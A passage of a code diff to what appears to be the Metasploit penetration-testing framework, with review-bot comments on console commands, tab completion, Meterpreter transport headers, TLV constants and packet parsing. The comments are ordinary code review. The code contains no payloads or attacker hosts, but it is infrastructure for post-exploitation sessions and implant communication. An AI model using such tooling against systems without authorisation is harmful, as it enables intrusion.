@@ -267,7 +267,7 @@ module Services
 when "manual" then startup_number = START_TYPE_MANUAL
 when "disable" then startup_number = START_TYPE_DISABLED
 else
- raise RuntimeError, "Invalid Startup Mode: #{mode}"
+ raise "Invalid Startup Mode: #{mode}"
 end
 end
 
@@ -453,7 +453,7 @@ module Services
 
 status = advapi32.QueryServiceStatus(service_handle,28)
 if (status["return"] == 0)
- raise RuntimeError.new("Could not query service. QueryServiceStatus error: #{status["ErrorMessage"]}")
+ raise "Could not query service. QueryServiceStatus error: #{status["ErrorMessage"]}"
 else
 ret = parse_service_status_struct(status['lpServiceStatus'])
 end
@@ -485,7 +485,7 @@ module Services
 vprint_good("[#{name}] Service started")
 return true
 else
- raise RuntimeError, status
+ raise status
 end
 rescue RuntimeError => s
 if tried
diff --git a/lib/msf/sanity.rb b/lib/msf/sanity.rb
deleted file mode 100644
index dc5ef2696d..0000000000
--- a/lib/msf/sanity.rb
+++ /dev/null
@@ -1,28 +0,0 @@
-# -*- coding: binary -*-
-#
-# Provides some sanity checks against the ruby build and version
-#
-
- if(RUBY_PLATFORM == 'java')
- require 'socket'
- s = Socket.new(::Socket::AF_INET, ::Socket::SOCK_STREAM, ::Socket::IPPROTO_TCP)
- if(not s.respond_to?('bind'))
- $stderr.puts "*** JRuby 1.5.0+ is required to use Metasploit with jRuby"
- exit(0)
- end
-
- $stderr.puts "*** Warning: JRuby support is still incomplete, few things will work properly!"
- trap Signal::list['INT'] do
- Thread.main.raise Interrupt.new
- end
-
- s.close
-end
-
-# Check for OpenSSL and print a warning if it is not installed
-begin
- require 'openssl'
-rescue ::LoadError
- $stderr.puts "*** The ruby-openssl library is not installed, many features will be disabled!"
- $stderr.puts "*** Examples: Meterpreter, SSL Sockets, SMB/NTLM Authentication, and more"
-end
diff --git a/lib/msf/ui/console/command_dispatcher/core.rb b/lib/msf/ui/console/command_dispatcher/core.rb
index 0cbc9416f5..85cd12da4a 100644
--- a/lib/msf/ui/console/command_dispatcher/core.rb
+++ b/lib/msf/ui/console/command_dispatcher/core.rb
@@ -47,7 +47,7 @@ class Core
 "-q" => [ false, "Quiet mode" ],
 "-k" => [ true, "Terminate sessions by session ID and/or range" ],
 "-K" => [ false, "Terminate all sessions" ],
- "-s" => [ true, "Run a script on the session given with -i, or all" ],
+ "-s" => [ true, "Run a script or module on the session given with -i, or all" ],
 "-r" => [ false, "Reset the ring buffer for the session given with -i, or all" ],
 "-u" => [ true, "Upgrade a shell to a meterpreter session on many platforms" ],
 "-t" => [ true, "Set a response timeout (default: 15)" ],
@@ -1107,7 +1107,7 @@ class Core
 if active_module
 # intentionally += and not << because we don't want to modify
 # datastore or the constant DefaultPrompt
- prompt += " #{active_module.type}(%bld%red#{active_module.shortname}%clr)"
+ prompt += " #{active_module.type}(%bld%red#{active_module.promptname}%clr)"
 end
 prompt_char = framework.datastore['PromptChar'] || Msf::Ui::Console::Driver::DefaultPromptChar
 driver.update_prompt("#{prompt} ", prompt_char, true)
@@ -1180,10 +1180,10 @@ class Core
 sid = val || false
 when "-K"
 method = 'killall'
- # Run a script on all meterpreter sessions
+ # Run a script or module on specified sessions
 when "-s"
 unless script
- method = 'scriptall'
+ method = 'script'
 script = val
 end
 # Upload and exec to the specific command session
@@ -1389,15 +1389,11 @@ class Core
 sid = nil
 end
 end
- when 'scriptall'
+ when 'script'
 unless script
- print_error("No script specified!")
+ print_error("No script or module specified!")
 return false
 end
- script_paths = {}
- script_paths['meterpreter'] = Msf::Sessions::Meterpreter.find_script_path(script)
- script_paths['shell'] = Msf::Sessions::CommandShell.find_script_path(script)
-
 sessions = sid ? session_list : framework.sessions.keys.sort
 sessions.each do |sess_id|
 
@@ -1413,15 +1409,13 @@ class Core
 session.response_timeout = response_timeout
 end
 begin
- if script_paths[session.type]
- print_status("Session #{sess_id} (#{session.session_host}):")
- print_status("Running script #{script} on #{session.type} session" +
- " #{sess_id} (#{session.session_host})")
- begin
- session.execute_file(script_paths[session.type], extra)
- rescue ::Exception => e
- log_error("Error executing script: #{e.class} #{e}")
- end
+ print_status("Session #{sess_id} (#{session.session_host}):")
+ print_status("Running #{script} on #{session.type} session" +
+ " #{sess_id} (#{session.session_host})")
+ begin
+ session.execute_script(script, *extra)
+ rescue ::Exception => e
+ log_error("Error executing script or module: #{e.class} #{e}")
 end
 ensure
 if session.respond_to?(:response_timeout) && last_known_timeout
@@ -1443,14 +1437,9 @@ class Core
 session.response_timeout = response_timeout
 end
 begin
- if ['shell', 'powershell'].include?(session.type)
- session.init_ui(driver.input, driver.output)
- session.execute_script('post/multi/manage/shell_to_meterpreter')
- session.reset_ui
- else
- print_error("Session #{sess_id} is not a command shell session, it is #{session.type}, skipping...")
- next
- end
+ session.init_ui(driver.input, driver.output)
+ session.execute_script('post/multi/manage/shell_to_meterpreter')
+ session.reset_ui
 ensure
 if session.respond_to?(:response_timeout) && last_known_timeout
 session.response_timeout = last_known_timeout
@@ -2209,16 +2198,7 @@ class Core
 if rh and not rh.empty?
 res << Rex::Socket.source_address(rh)
 else
- res << Rex::Socket.source_address
- # getifaddrs was introduced in 2.1.2
- if Socket.respond_to?(:getifaddrs)
- ifaddrs = Socket.getifaddrs.find_all do |ifaddr|
- ((ifaddr.flags & Socket::IFF_LOOPBACK) == 0) &&
- ifaddr.addr &&
- ifaddr.addr.ip?
- end
- res += ifaddrs.map { |ifaddr| ifaddr.addr.ip_address }
- end
+ res += tab_complete_source_address
 end
 else
 end
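Review bot: `rescue ::Exception => e` around `session.execute_script(script, *extra)` also catches Interrupt and SystemExit, so a Ctrl-C during a long-running module is logged as "Error executing script or module" and the loop simply moves on to the next session instead of stopping. The old code had the same width, but since the line is being rewritten anyway it should become `rescue ::StandardError => e`. The enclosing sessions.each block starts outside the hunk.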
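Review bot: The `-u` path no longer checks `session.type` before running post/multi/manage/shell_to_meterpreter, so a meterpreter session inside the selected range is now handed to the upgrade module instead of being skipped with the previous explanatory message. Unless that module is known to reject non-shell sessions itself, keep a guard such as `next unless ['shell', 'powershell'].include?(session.type)` ahead of `session.init_ui`. If the removal is deliberate because the module now copes with every session type, a one-line comment saying so will stop the next reader from re-adding the check. The enclosing loop starts outside the hunk.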
diff --git a/lib/msf/ui/console/command_dispatcher/db.rb b/lib/msf/ui/console/command_dispatcher/db.rb
index e37a16a350..3155a0a7c9 100644
--- a/lib/msf/ui/console/command_dispatcher/db.rb
+++ b/lib/msf/ui/console/command_dispatcher/db.rb
@@ -354,6 +354,8 @@ class Db
 end
 end
 
+ @@hosts_columns = [ 'address', 'mac', 'name', 'os_name', 'os_flavor', 'os_sp', 'purpose', 'info', 'comments']
+
 def cmd_hosts(*args)
 return unless active?
 ::ActiveRecord::Base.connection_pool.with_connection {
@@ -371,7 +373,7 @@ class Db
 default_columns << 'tags' # Special case
 virtual_columns = [ 'svcs', 'vulns', 'workspace', 'tags' ]
 
- col_search = [ 'address', 'mac', 'name', 'os_name', 'os_flavor', 'os_sp', 'purpose', 'info', 'comments']
+ col_search = @@hosts_columns
 
 default_columns.delete_if {|v| (v[-2,2] == "id")}
 while (arg = args.shift)
@@ -380,7 +382,7 @@ class Db
 mode << :add
 when '-d','--delete'
 mode << :delete
- when '-c'
+ when '-c','-C'
 list = args.shift
 if(!list)
 print_error("Invalid column list")
@@ -394,6 +396,10 @@ class Db
 return
 end
 }
+ if (arg == '-C')
+ @@hosts_columns = col_search
+ end
+
 when '-u','--up'
 onlyup = true
 when '-o'
@@ -426,6 +432,7 @@ class Db
 print_line " -a,--add Add the hosts instead of searching"
 print_line " -d,--delete Delete the hosts instead of searching"
 print_line " -c Only show the given columns (see list below)"
+ print_line " -C Only show the given columns until the next restart (see list below)"
 print_line " -h,--help Show this help information"
 print_line " -u,--up Only show hosts which are up"
 print_line " -o Send output to a file in csv format"
@@ -1826,6 +1833,8 @@ class Db
 if (path)
 auth, dest = path.split('@')
 (dest = auth and auth = nil) if not dest
+ # remove optional scheme in database url
+ auth = auth.sub(/^\w+:\/\//, "") if auth
 res[:user],res[:pass] = auth.split(':') if auth
 targ,name = dest.split('/')
 (name = targ and targ = nil) if not name
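Review bot: `@@hosts_columns` is a class variable holding mutable state that `-C` overwrites from user input; class variables are shared across the whole inheritance tree, and `col_search = @@hosts_columns` aliases the same array on every later call, so any in-place mutation of col_search further down cmd_hosts would silently rewrite the persisted default. A class-level instance variable with an accessor (`@hosts_columns` behind `class << self; attr_accessor :hosts_columns; end`) or at least `col_search = @@hosts_columns.dup` avoids both problems. The persisted value should also be documented where it is declared, e.g. `# Column list shown by "hosts"; "hosts -C" replaces it for the rest of this process.` The -371 and later hunks are inside cmd_hosts, which starts outside them.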
diff --git a/lib/msf/ui/console/command_dispatcher/exploit.rb b/lib/msf/ui/console/command_dispatcher/exploit.rb
index 08ac8aa8a7..5d6f0a5564 100644
--- a/lib/msf/ui/console/command_dispatcher/exploit.rb
+++ b/lib/msf/ui/console/command_dispatcher/exploit.rb
@@ -164,6 +164,21 @@ class Exploit
 end
 end
 
+ def cmd_exploit_tabs(str, words)
+ fmt = {
+ '-e' => [ framework.encoders.map { |refname, mod| refname } ],
+ '-f' => [ nil ],
+ '-h' => [ nil ],
+ '-j' => [ nil ],
+ '-n' => [ framework.nops.map { |refname, mod| refname } ],
+ '-o' => [ true ],
+ '-p' => [ framework.payloads.map { |refname, mod| refname } ],
+ '-t' => [ true ],
+ '-z' => [ nil ]
+ }
+ tab_complete_generic(fmt, str, words)
+ end
+
 alias cmd_run cmd_exploit
 
 def cmd_exploit_help
diff --git a/lib/msf/ui/console/command_dispatcher/jobs.rb b/lib/msf/ui/console/command_dispatcher/jobs.rb
index 85fc1071d1..797e0b9192 100644
--- a/lib/msf/ui/console/command_dispatcher/jobs.rb
+++ b/lib/msf/ui/console/command_dispatcher/jobs.rb
@@ -341,6 +341,19 @@ module Msf
 print_status "Payload handler running as background job #{job_id}."
 end
 
+
+ def cmd_handler_tabs(str, words)
+ fmt = {
+ '-h' => [ nil ],
+ '-x' => [ nil ],
+ '-p' => [ framework.payloads.map { |refname, mod| refname } ],
+ '-P' => [ true ],
+ '-H' => [ :address ],
+ '-e' => [ framework.encoders.map { |refname, mod| refname } ],
+ '-n' => [ true ]
+ }
+ tab_complete_generic(fmt, str, words)
+ end
 end
 end
 end
diff --git a/lib/msf/ui/console/command_dispatcher/modules.rb b/lib/msf/ui/console/command_dispatcher/modules.rb
index b3142c5302..6238599397 100644
--- a/lib/msf/ui/console/command_dispatcher/modules.rb
+++ b/lib/msf/ui/console/command_dispatcher/modules.rb
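Review bot: In both cmd_exploit_tabs and cmd_handler_tabs the block parameter `mod` is unused in `framework.encoders.map { |refname, mod| refname }` and the nops/payloads variants; if the module sets are Hash-like, `framework.encoders.keys` says the same thing, otherwise `map { |refname, _| refname }` at least marks the intent. The same pattern recurs in cmd_generate_tabs in the later payload.rb hunk. A one-line comment above each `fmt` hash pointing at tab_complete_generic's spec (`nil` flag, `true` free-form value, Array of choices, `:address`/`:file` helpers) would spare readers a lookup.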
@@ -94,10 +94,12 @@ module Msf
 print_status("Launching #{editor} #{path}")
 system(editor, path)
 
- # XXX: This will try to reload *anything* and break on modules
- if args.length > 0
+ # XXX: This will try to reload *any* .rb and break on modules
+ if args.length > 0 && path.end_with?('.rb')
 print_status("Reloading #{path}")
 load path
+ else
+ print_error('Only Ruby files can be reloaded (use reload/rerun for modules)')
 end
 else
 print_error('Nothing to edit -- try using a module first.')
@@ -659,7 +661,7 @@ module Msf
 # Update the command prompt
 prompt = framework.datastore['Prompt'] || Msf::Ui::Console::Driver::DefaultPrompt
 prompt_char = framework.datastore['PromptChar'] || Msf::Ui::Console::Driver::DefaultPromptChar
- driver.update_prompt("#{prompt} #{mod.type}(%bld%red#{mod.shortname}%clr) ", prompt_char, true)
+ driver.update_prompt("#{prompt} #{mod.type}(%bld%red#{mod.promptname}%clr) ", prompt_char, true)
 end
 
 #
diff --git a/lib/msf/ui/console/command_dispatcher/payload.rb b/lib/msf/ui/console/command_dispatcher/payload.rb
index 16e1e3f8b3..9edeb071ca 100644
--- a/lib/msf/ui/console/command_dispatcher/payload.rb
+++ b/lib/msf/ui/console/command_dispatcher/payload.rb
@@ -13,7 +13,7 @@ module Msf
 include Msf::Ui::Console::ModuleCommandDispatcher
 
 # Load supported formats
- supported_formats = \
+ @@supported_formats = \
 Msf::Simple::Buffer.transform_formats + \
 Msf::Util::EXE.to_executable_fmt_formats
 
@@ -25,7 +25,7 @@ module Msf
 "-o" => [ true, "A comma separated list of options in VAR=VAL format." ],
 "-s" => [ true, "NOP sled length." ],
 "-f" => [ true, "The output file name (otherwise stdout)" ],
- "-t" => [ true, "The output format: #{supported_formats.join(',')}" ],
+ "-t" => [ true, "The output format: #{@@supported_formats.join(',')}" ],
 "-p" => [ true, "The Platform for output." ],
 "-k" => [ false, "Keep the template executable functional" ],
 "-x" => [ true, "The executable template to use" ],
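Review bot: Folding the reload request and the extension check into `if args.length > 0 && path.end_with?('.rb')` makes the new `else` branch print "Only Ruby files can be reloaded" even when no reload was asked for, i.e. on every plain edit of a non-.rb path. Keep the two conditions apart: change `else` to `elsif args.length > 0` so the message only appears when a reload was requested for a non-Ruby file. The enclosing edit command body starts outside the hunk.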
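Review bot: `@@supported_formats` becomes a class variable only so that cmd_generate_tabs in the following hunk can read it; since the list is computed once at load time and never changes, a frozen constant `SUPPORTED_FORMATS = (Msf::Simple::Buffer.transform_formats + Msf::Util::EXE.to_executable_fmt_formats).freeze` is the idiomatic form, is visible to instance methods without class-variable sharing, and reads the same inside the `-t` help string. This applies to both payload.rb hunks on this line and to the `'-t' => [ @@supported_formats ]` entry in the next hunk.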
@@ -151,6 +151,24 @@ module Msf
 end
 true
 end
+
+ def cmd_generate_tabs(str, words)
+ fmt = {
+ '-b' => [ true ],
+ '-E' => [ nil ],
+ '-e' => [ framework.encoders.map { |refname, mod| refname } ],
+ '-h' => [ nil ],
+ '-o' => [ true ],
+ '-s' => [ true ],
+ '-f' => [ :file ],
+ '-t' => [ @@supported_formats ],
+ '-p' => [ true ],
+ '-k' => [ nil ],
+ '-x' => [ :file ],
+ '-i' => [ true ]
+ }
+ tab_complete_generic(fmt, str, words)
+ end
 end
 end
 end
diff --git a/lib/msf/ui/console/command_dispatcher/resource.rb b/lib/msf/ui/console/command_dispatcher/resource.rb
index b020bd743f..8f2e6277fd 100644
--- a/lib/msf/ui/console/command_dispatcher/resource.rb
+++ b/lib/msf/ui/console/command_dispatcher/resource.rb
@@ -59,8 +59,8 @@ module Msf
 elsif
 # let's check to see if it's in the scripts/resource dir (like when tab completed)
 [
- ::Msf::Config.script_directory + ::File::SEPARATOR + "resource",
- ::Msf::Config.user_script_directory + ::File::SEPARATOR + "resource"
+ ::Msf::Config.script_directory + ::File::SEPARATOR + 'resource',
+ ::Msf::Config.user_script_directory + ::File::SEPARATOR + 'resource'
 ].each do |dir|
 res_path = dir + ::File::SEPARATOR + res
 if ::File.exist?(res_path)
@@ -97,7 +97,7 @@ module Msf
 [
 ::Msf::Config.script_directory + File::SEPARATOR + "resource",
 ::Msf::Config.user_script_directory + File::SEPARATOR + "resource",
- "."
+ '.'
 ].each do |dir|
 next if not ::File.exist? dir
 tabs += ::Dir.new(dir).find_all { |e|
diff --git a/lib/msf/ui/console/driver.rb b/lib/msf/ui/console/driver.rb
index 1e303bf4ee..fd53c3278b 100644
--- a/lib/msf/ui/console/driver.rb
+++ b/lib/msf/ui/console/driver.rb
@@ -138,15 +138,6 @@ class Driver < Msf::Ui::Driver
 print_error("***")
 end
 
- begin
- require 'openssl'
- rescue ::LoadError
- print_error("***")
- print_error("* WARNING: No OpenSSL support. This is required by meterpreter payloads and many exploits")
- print_error("* Please install the ruby-openssl package (apt-get install libopenssl-ruby on Debian/Ubuntu")
- print_error("***")
- end
-
 # Register event handlers
 register_event_handlers
 
@@ -191,24 +182,10 @@ class Driver < Msf::Ui::Driver
 end
 end
 
- # framework.db.active will be true if after_establish_connection ran directly when connection_established? was
- # already true or if framework.db.connect called after_establish_connection.
- if !! framework.db.error
- if framework.db.error.to_s =~ /RubyGem version.*pg.*0\.11/i
- print_error("***")
- print_error("*")
- print_error("* Metasploit now requires version 0.11 or higher of the 'pg' gem for database support")
- print_error("* There a three ways to accomplish this upgrade:")
- print_error("* 1. If you run Metasploit with your system ruby, simply upgrade the gem:")
- print_error("* $ rvmsudo gem install pg ")
- print_error("* 2. Use the Community Edition web interface to apply a Software Update")
- print_error("* 3. Uninstall, download the latest version, and reinstall Metasploit")
- print_error("*")
- print_error("***")
- print_error("")
- print_error("")
- end
-
+ # framework.db.active will be true if after_establish_connection ran
+ # directly when connection_established? was already true or if
+ # framework.db.connect called after_establish_connection.
+ if !!framework.db.error
 print_error("Failed to connect to the database: #{framework.db.error}")
 end
 end
@@ -250,108 +227,6 @@ class Driver < Msf::Ui::Driver
 end
 end
 
- #
- # Configure a default output path for jUnit XML output
- #
- def junit_setup(output_path)
- output_path = ::File.expand_path(output_path)
-
- ::FileUtils.mkdir_p(output_path)
- @junit_output_path = output_path
- @junit_error_count = 0
- print_status("Test Output: #{output_path}")
-
- # We need at least one test success in order to pass
- junit_pass("framework_loaded")
- end
-
- #
- # Emit a new jUnit XML output file representing an error
- #
- def junit_error(tname, ftype, data = nil)
-
- if not @junit_output_path
- raise RuntimeError, "No output path, call junit_setup() first"
- end
-
- data ||= framework.inspect.to_s
-
- e = REXML::Element.new("testsuite")
-
- c = REXML::Element.new("testcase")
- c.attributes["classname"] = "msfrc"
- c.attributes["name"] = tname
-
- f = REXML::Element.new("failure")
- f.attributes["type"] = ftype
-
- f.text = data
- c << f
- e << c
-
- bname = ("msfrpc_#{tname}").gsub(/[^A-Za-z0-9\.\_]/, '')
- bname << "_" + Digest::MD5.hexdigest(tname)
-
- fname = ::File.join(@junit_output_path, "#{bname}.xml")
- cnt = 0
- while ::File.exist?( fname )
- cnt += 1
- fname = ::File.join(@junit_output_path, "#{bname}_#{cnt}.xml")
- end
-
- ::File.open(fname, "w") do |fd|
- fd.write(e.to_s)
- end
-
- print_error("Test Error: #{tname} - #{ftype} - #{data}")
- end
-
- #
- # Emit a new jUnit XML output file representing a success
- #
- def junit_pass(tname)
-
- if not @junit_output_path
- raise RuntimeError, "No output path, call junit_setup() first"
- end
-
- # Generate the structure of a test case run
- e = REXML::Element.new("testsuite")
- c = REXML::Element.new("testcase")
- c.attributes["classname"] = "msfrc"
- c.attributes["name"] = tname
- e << c
-
- # Generate a unique name
- bname = ("msfrpc_#{tname}").gsub(/[^A-Za-z0-9\.\_]/, '')
- bname << "_" + Digest::MD5.hexdigest(tname)
-
- # Generate the output path, allow multiple test with the same name
- fname = ::File.join(@junit_output_path, "#{bname}.xml")
- cnt = 0
- while ::File.exist?( fname )
- cnt += 1
- fname = ::File.join(@junit_output_path, "#{bname}_#{cnt}.xml")
- end
-
- # Write to our test output location, as specified with junit_setup
- ::File.open(fname, "w") do |fd|
- fd.write(e.to_s)
- end
-
- print_good("Test Pass: #{tname}")
- end
-
-
- #
- # Emit a jUnit XML output file and throw a fatal exception
- #
- def junit_fatal_error(tname, ftype, data)
- junit_error(tname, ftype, data)
- print_error("Exiting")
- run_single("exit -y")
- end
-
 #
 # Loads configuration that needs to be analyzed before the framework
 # instance is created.
diff --git a/lib/msf/ui/console/module_command_dispatcher.rb b/lib/msf/ui/console/module_command_dispatcher.rb
index 7f378440cc..7064ce6e83 100644
--- a/lib/msf/ui/console/module_command_dispatcher.rb
+++ b/lib/msf/ui/console/module_command_dispatcher.rb
@@ -209,10 +209,10 @@ module ModuleCommandDispatcher
 end
 
 rhost = instance.datastore['RHOST']
- rport = nil
+ rport = instance.datastore['RPORT']
 peer = rhost
- if instance.datastore['rport']
- rport = instance.rport
+ if rport
+ rport = instance.rport if instance.respond_to?(:rport)
 peer = "#{rhost}:#{rport}"
 end
 
diff --git a/lib/msf/util/exe.rb b/lib/msf/util/exe.rb
index e5f502838a..f60175244a 100644
--- a/lib/msf/util/exe.rb
+++ b/lib/msf/util/exe.rb
@@ -1122,7 +1122,7 @@ require 'msf/core/exe/segment_appender'
 to_exe_elf(framework, opts, "template_x64_linux_dll.bin", code)
 end
 
- # self.to_linux_mipsle_elf
+ # self.to_linux_armle_elf
 #
 # @param framework [Msf::Framework]
 # @param code [String]
@@ -1133,6 +1133,17 @@ require 'msf/core/exe/segment_appender'
 to_exe_elf(framework, opts, "template_armle_linux.bin", code)
 end
 
+ # self.to_linux_aarch64_elf
+ #
+ # @param framework [Msf::Framework]
+ # @param code [String]
+ # @param opts [Hash]
+ # @option [String] :template
+ # @return [String] Returns an elf
+ def self.to_linux_aarch64_elf(framework, code, opts = {})
+ to_exe_elf(framework, opts, "template_aarch64_linux.bin", code)
+ end
+
 # self.to_linux_mipsle_elf
 # Little Endian
 # @param framework [Msf::Framework]
diff --git a/lib/rex/payloads/meterpreter/config.rb b/lib/rex/payloads/meterpreter/config.rb
index 2c0479c9af..b3f56043cd 100644
--- a/lib/rex/payloads/meterpreter/config.rb
+++ b/lib/rex/payloads/meterpreter/config.rb
@@ -108,15 +108,19 @@ private
 cert_hash = "\x00" * CERT_HASH_SIZE
 cert_hash = opts[:ssl_cert_hash] if opts[:ssl_cert_hash]
 
+ custom_headers = opts[:custom_headers] || ''
+ custom_headers = to_str(custom_headers, custom_headers.length + 1)
+
 # add the HTTP specific stuff
- transport_data << proxy_host # Proxy host name
- transport_data << proxy_user # Proxy user name
- transport_data << proxy_pass # Proxy password
- transport_data << ua # HTTP user agent
- transport_data << cert_hash # SSL cert hash for verification
+ transport_data << proxy_host # Proxy host name
+ transport_data << proxy_user # Proxy user name
+ transport_data << proxy_pass # Proxy password
+ transport_data << ua # HTTP user agent
+ transport_data << cert_hash # SSL cert hash for verification
+ transport_data << custom_headers # any custom headers that the client needs
 
 # update the packing spec
- pack << 'A*A*A*A*A*'
+ pack << 'A*A*A*A*A*A*'
 end
 
 # return the packed transport information
diff --git a/lib/rex/post/meterpreter/client_core.rb b/lib/rex/post/meterpreter/client_core.rb
index 69d509ef89..79132a548c 100644
--- a/lib/rex/post/meterpreter/client_core.rb
+++ b/lib/rex/post/meterpreter/client_core.rb
@@ -139,15 +139,16 @@ class ClientCore < Extension
 
 response.each(TLV_TYPE_TRANS_GROUP) { |t|
 result[:transports] << {
- :url => t.get_tlv_value(TLV_TYPE_TRANS_URL),
- :comm_timeout => t.get_tlv_value(TLV_TYPE_TRANS_COMM_TIMEOUT),
- :retry_total => t.get_tlv_value(TLV_TYPE_TRANS_RETRY_TOTAL),
- :retry_wait => t.get_tlv_value(TLV_TYPE_TRANS_RETRY_WAIT),
- :ua => t.get_tlv_value(TLV_TYPE_TRANS_UA),
- :proxy_host => t.get_tlv_value(TLV_TYPE_TRANS_PROXY_HOST),
- :proxy_user => t.get_tlv_value(TLV_TYPE_TRANS_PROXY_USER),
- :proxy_pass => t.get_tlv_value(TLV_TYPE_TRANS_PROXY_PASS),
- :cert_hash => t.get_tlv_value(TLV_TYPE_TRANS_CERT_HASH)
+ :url => t.get_tlv_value(TLV_TYPE_TRANS_URL),
+ :comm_timeout => t.get_tlv_value(TLV_TYPE_TRANS_COMM_TIMEOUT),
+ :retry_total => t.get_tlv_value(TLV_TYPE_TRANS_RETRY_TOTAL),
+ :retry_wait => t.get_tlv_value(TLV_TYPE_TRANS_RETRY_WAIT),
+ :ua => t.get_tlv_value(TLV_TYPE_TRANS_UA),
+ :proxy_host => t.get_tlv_value(TLV_TYPE_TRANS_PROXY_HOST),
+ :proxy_user => t.get_tlv_value(TLV_TYPE_TRANS_PROXY_USER),
+ :proxy_pass => t.get_tlv_value(TLV_TYPE_TRANS_PROXY_PASS),
+ :cert_hash => t.get_tlv_value(TLV_TYPE_TRANS_CERT_HASH),
+ :custom_headers => t.get_tlv_value(TLV_TYPE_TRANS_HEADERS)
 }
 }
 
@@ -555,6 +556,7 @@ class ClientCore < Extension
 # We cannot migrate into a process that we are unable to open
 # On linux, arch is empty even if we can access the process
 if client.platform == 'windows'
+
 if target_process['arch'] == nil || target_process['arch'].empty?
 raise RuntimeError, "Cannot migrate into this process (insufficient privileges)", caller
 end
@@ -718,7 +720,8 @@ private
 # Get a reference to the currently active transport.
 #
 def get_current_transport
- transport_list[:transports][0]
+ x = transport_list
+ x[:transports][0]
 end
 
 #
@@ -728,6 +731,7 @@ private
 def generate_migrate_stub(target_process)
 stub = nil
 
+
 if client.platform == 'windows' && [ARCH_X86, ARCH_X64].include?(client.arch)
 t = get_current_transport
 
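Review bot: In get_current_transport the temporary `x = transport_list` followed by `x[:transports][0]` adds a name that conveys nothing; `transport_list[:transports].first` is equivalent, and if the temporary exists to make the result inspectable while debugging, give it a descriptive name and say so in a comment. transport_list is called once either way, so this is purely a readability point. The blank lines added inside `if client.platform == 'windows'` and at the top of generate_migrate_stub are whitespace only.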
diff --git a/lib/rex/post/meterpreter/packet.rb b/lib/rex/post/meterpreter/packet.rb
index a027e25233..35fb4b0da1 100644
--- a/lib/rex/post/meterpreter/packet.rb
+++ b/lib/rex/post/meterpreter/packet.rb
@@ -102,7 +102,8 @@ TLV_TYPE_TRANS_PROXY_USER = TLV_META_TYPE_STRING | 437
 TLV_TYPE_TRANS_PROXY_PASS = TLV_META_TYPE_STRING | 438
 TLV_TYPE_TRANS_RETRY_TOTAL = TLV_META_TYPE_UINT | 439
 TLV_TYPE_TRANS_RETRY_WAIT = TLV_META_TYPE_UINT | 440
-TLV_TYPE_TRANS_GROUP = TLV_META_TYPE_GROUP | 441
+TLV_TYPE_TRANS_HEADERS = TLV_META_TYPE_STRING | 441
+TLV_TYPE_TRANS_GROUP = TLV_META_TYPE_GROUP | 442
 
 TLV_TYPE_MACHINE_ID = TLV_META_TYPE_STRING | 460
 TLV_TYPE_UUID = TLV_META_TYPE_RAW | 461
diff --git a/lib/rex/post/meterpreter/packet_parser.rb b/lib/rex/post/meterpreter/packet_parser.rb
index 28bd1ef584..ca646e39fd 100644
--- a/lib/rex/post/meterpreter/packet_parser.rb
+++ b/lib/rex/post/meterpreter/packet_parser.rb
@@ -27,27 +27,28 @@ class PacketParser
 end
 
 #
- # Reads data from the wire and parse as much of the packet as possible.
+ # Reads data from the socket and parses as much of the packet as possible.
 #
 def recv(sock)
- bytes_left = self.packet.raw_bytes_required
-
- if bytes_left > 0
- raw = sock.read(bytes_left)
- if raw
+ raw = nil
+ if self.packet.raw_bytes_required > 0
+ while (raw = sock.read(self.packet.raw_bytes_required))
 self.packet.add_raw(raw)
- else
- raise EOFError
+ break if self.packet.raw_bytes_required == 0
 end
 end
 
- if self.packet.raw_bytes_required == 0
- packet = self.packet
- reset
- return packet
+ if self.packet.raw_bytes_required > 0
+ if raw == nil
+ raise EOFError
+ else
+ return nil
+ end
 end
 
- nil
+ packet = self.packet
+ reset
+ packet
 end
 
 protected
diff --git a/lib/rex/post/meterpreter/ui/console/command_dispatcher/core.rb b/lib/rex/post/meterpreter/ui/console/command_dispatcher/core.rb
index a9cafc2d71..5d854c6fd1 100644
--- a/lib/rex/post/meterpreter/ui/console/command_dispatcher/core.rb
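Review bot: Renumbering `TLV_TYPE_TRANS_GROUP` from 441 to 442 to make room for `TLV_TYPE_TRANS_HEADERS` changes the wire protocol: a Meterpreter built against the old constants still sends its transport group as 441, which this side now decodes as a string TLV, so transport_list for such a session yields no transports. The gemspec bump to metasploit-payloads 1.3.18 presumably ships matching binaries, but that coupling belongs next to the constants, e.g. `# 441 was TLV_TYPE_TRANS_GROUP before metasploit-payloads 1.3.18; both ends must agree on these numbers`. Appending the new type after the existing ones rather than inserting it would have avoided the incompatibility altogether.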
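Review bot: In recv the `else return nil` branch after the read loop appears unreachable: the loop exits with `raw` non-nil only through the `break` taken when raw_bytes_required is 0, so reaching `raw_bytes_required > 0` afterwards implies `raw == nil`; the whole block can shrink to `raise EOFError if self.packet.raw_bytes_required > 0`. The rewrite also changes the contract, since recv now blocks until the whole packet has arrived or the socket hits EOF instead of returning nil after a short read, and the new docstring should say so, e.g. `# Blocks until a complete packet has been read; raises EOFError if the socket closes first.` The method is complete within the hunk.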
+++ b/lib/rex/post/meterpreter/ui/console/command_dispatcher/core.rb 
@@ -1530,49 +1530,73 @@ class Console::CommandDispatcher::Core
 end
 
 def cmd_resource_help
- print_line('Usage: resource [path2 ...]')
+ print_line "Usage: resource path1 [path2 ...]"
 print_line
- print_line('Run the commands stored in the supplied files.')
+ print_line "Run the commands stored in the supplied files (- for stdin)."
+ print_line "Resource files may also contain ERB or Ruby code between tags."
 print_line
 end
 
 def cmd_resource(*args)
 if args.empty?
+ cmd_resource_help
 return false
 end
 
- args.each do |glob|
- files = ::Dir.glob(::File.expand_path(glob))
- if files.empty?
- print_error("No such file #{glob}")
- next
- end
- files.each do |filename|
- print_status("Reading #(unknown)")
- if (not ::File.readable?(filename))
- print_error("Could not read file #(unknown)")
- next
- else
- ::File.open(filename, 'r').each_line do |line|
- next if line.strip.length < 1
- next if line[0,1] == '#'
- begin
- print_status("Running #{line}")
- client.console.run_single(line)
- rescue ::Exception => e
- print_error("Error Running Command #{line}: #{e.class} #{e}")
- end
-
+ args.each do |res|
+ good_res = nil
+ if res == '-'
+ good_res = res
+ elsif ::File.exist?(res)
+ good_res = res
+ elsif
+ # let's check to see if it's in the scripts/resource dir (like when tab completed)
+ [
+ ::Msf::Config.script_directory + ::File::SEPARATOR + 'resource' + ::File::SEPARATOR + 'meterpreter',
+ ::Msf::Config.user_script_directory + ::File::SEPARATOR + 'resource' + ::File::SEPARATOR + 'meterpreter'
+ ].each do |dir|
+ res_path = dir + ::File::SEPARATOR + res
+ if ::File.exist?(res_path)
+ good_res = res_path
+ break
 end
 end
 end
+ if good_res
+ client.console.load_resource(good_res)
+ else
